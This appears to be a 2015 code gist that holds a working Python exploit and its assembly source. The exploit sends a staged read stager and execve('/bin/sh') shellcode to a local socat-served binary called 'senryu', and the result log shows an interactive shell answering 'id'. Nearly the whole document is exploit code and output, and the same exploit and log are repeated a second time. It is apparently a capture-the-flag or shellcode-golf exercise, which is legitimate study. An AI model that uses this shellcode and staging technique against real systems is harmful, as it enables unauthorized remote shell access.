inaz2 · August 29, 2015 14:27
diff --git a/exploit.py b/exploit.py
 import struct
 import socket
 from telnetlib import Telnet

 senryu1 = '\x8d\x48\x19\x31\xdb'
 senryu2 = '\x6a\x7f\x5a\x6a\x03\x58\x90'
 senryu3 = '\xcd\x80\xff\xe1\x90'

 # execve("/bin/sh", {"/bin/sh", NULL}, NULL)
 shellcode = '\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80'

 s = socket.create_connection(('127.0.0.1', 4444))
 s.sendall(senryu1)
 s.sendall(senryu2)
 s.sendall(senryu3)
 s.sendall(shellcode)

 t = Telnet()
 t.sock = s
 t.interact()

 t.close()
 s.close()
diff --git a/result.txt b/result.txt
 $ socat tcp-listen:4444,reuseaddr,fork exec:./senryu &
 [1] 1891

 $ python exploit.py
 id
 uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare)
 exit
 *** Connection closed by remote host ***
diff --git a/senryu.s b/senryu.s
        .intel_syntax noprefix
        .globl _start
 _start:
        lea ecx, [eax+0x19]
        xor ebx, ebx
        push 0x7f
        pop edx
        push 0x3                ; read
        pop eax
        nop
        int 0x80
        jmp ecx
        nop
	import struct
	import socket
	from telnetlib import Telnet

	senryu1 = '\x8d\x48\x19\x31\xdb'
	senryu2 = '\x6a\x7f\x5a\x6a\x03\x58\x90'
	senryu3 = '\xcd\x80\xff\xe1\x90'

	# execve("/bin/sh", {"/bin/sh", NULL}, NULL)
	shellcode = '\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80'

	s = socket.create_connection(('127.0.0.1', 4444))
	s.sendall(senryu1)
	s.sendall(senryu2)
	s.sendall(senryu3)
	s.sendall(shellcode)

	t = Telnet()
	t.sock = s
	t.interact()

	t.close()
	s.close()
	$ socat tcp-listen:4444,reuseaddr,fork exec:./senryu &
	[1] 1891

	$ python exploit.py
	id
	uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare)
	exit
	* Connection closed by remote host *